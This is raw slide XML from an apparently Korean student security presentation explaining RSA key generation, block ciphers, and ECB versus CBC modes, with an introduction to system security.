            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>만약</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>와 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>N </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>이 서로소가 아닐 시</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>다시 처음부터 구한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>확장된 유클리드 호제법</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>을 이용해 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(d x e) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="373A3C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t> ≡ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="373A3C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> φ(N) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>을 만족하는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>를 구한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>처음에 선택한 두 소수 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(P, Q)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>는 유출되면 안되므로 삭제한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>패티도 동일한 과정을 거친다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4039189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0" y="3152898"/>
            <a:ext cx="4815445"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(60%)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6466116" y="2260233"/>
            <a:ext cx="2719452"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(30%)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8" name="그룹 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{350EE7F8-192D-4579-99D9-7183645FE9D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C76D0BB-B0C2-4431-A6E6-D4537C76013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49F913F-D8CB-4FA6-AA3B-F71F140D2F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B6096A7-5F03-4DE7-836A-3CDF6A3318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124887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정보보호 기말과제</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BA33D6A5-246F-48C0-AF99-4D83407A6DD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="436449" y="1921912"/>
            <a:ext cx="5282973" cy="4338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그림 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCF02617-3C75-4512-AEB7-A119DEEC08B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6073307" y="1690688"/>
            <a:ext cx="5424728" cy="50745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2682304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구현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그동안은</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구현하기 위한 추진체였다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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> 으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>구현하시오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python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구현할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4011847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9778B671-0C01-4FBF-BC49-D43D11804DA4}"/>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9064823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F8907B7-D4F7-4235-B145-39E62E05E639}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="956000" y="2136338"/>
            <a:ext cx="8555393" cy="2585323"/>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Block </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>암호란</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>    -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>평문을</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 블록 단위로 암호화하는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>대칭키</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 암호 시스템</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>블록 단위로 암호화를 한다는 의미</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>    -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 암호화 방식을 정할 때</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>임의의 길이</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>평문에</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 대해 고민할 필요가 없이 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>고정된 길이의 각 블록을 암호화하는 방식만 정하면 된다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="103402140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 name="Picture 2" descr="Investigating Block Cipher Modes with DPA - ChipWhisperer Wiki">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B98D54A-7CA4-4B9A-BB3A-7A15B2825D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7024" y="4048126"/>
            <a:ext cx="5724525" cy="2305050"/>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083940DA-2644-4CC8-8E74-8E400D14C4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7265" y="1929829"/>
            <a:ext cx="1585912" cy="1879156"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="그림 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A60F17C-3CAD-454D-AA47-8D58501F71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2038" y="1929829"/>
            <a:ext cx="1585912" cy="1879156"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D11E3851-9494-4B85-AB2B-90E6A4CE840D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1172255" y="2111302"/>
            <a:ext cx="1338943" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="7030A0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>ECB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>암호</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{546B426F-0BA1-4BC9-A2FF-CA09A35FF932}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="286430" y="2625208"/>
            <a:ext cx="3110594" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent6">
                <a:lumMod val="50000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>각 블록에 사용된 키가 같음</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="402111145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83940DA-2644-4CC8-8E74-8E400D14C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7265" y="1929829"/>
            <a:ext cx="1585912" cy="1879156"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D11E3851-9494-4B85-AB2B-90E6A4CE840D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1172255" y="2111302"/>
            <a:ext cx="1338943" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="7030A0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>CBC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>암호</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{546B426F-0BA1-4BC9-A2FF-CA09A35FF932}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="286430" y="2625208"/>
            <a:ext cx="3110594" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent6">
                <a:lumMod val="50000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>각 블록에 사용된 키가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>다름</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6146" name="Picture 2" descr="Block cipher mode of operation - Wikipedia">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22325523-97EE-4987-B776-7E3C4547A0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3428" y="4195033"/>
            <a:ext cx="5715000" cy="2305050"/>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33AFA75D-EBCB-4074-AA96-3A87974160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5780" y="1929829"/>
            <a:ext cx="1585912" cy="1879156"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13928227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실행 단추: 문서 14">
            <a:hlinkClick r:id="rId4" action="ppaction://hlinkfile"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C642B003-6020-4FE7-AA7E-45DA4D6257C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9299644" y="3527960"/>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id="{5B20F288-DE2B-4404-9C20-09AC05312DB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1133856" y="1791005"/>
            <a:ext cx="5563710" cy="4507222"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="그림 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5DD02C1-4E61-4FAF-B719-6BF37EFED382}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7807068" y="4283098"/>
            <a:ext cx="3505689" cy="1486107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C64626EF-629B-4315-A333-5D73F4F5690A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8715615" y="2917098"/>
            <a:ext cx="1688592" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>AES.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>클릭</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="257469672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보안이란</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>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67586" y="2046803"/>
            <a:ext cx="6467412" cy="2410140"/>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시스템 보안</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?</a:t>
            </a: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권한 없는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>허가 받지 않은</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>사용자에 의한 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>파일</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>폴더 및 장치 등의 사용을 제한하여 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>보호하는 시스템 기능</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1821201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보안의 요소</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67586" y="2046802"/>
            <a:ext cx="6467412" cy="3699989"/>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시스템 보안의 요소</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0">
              <a:solidFill>
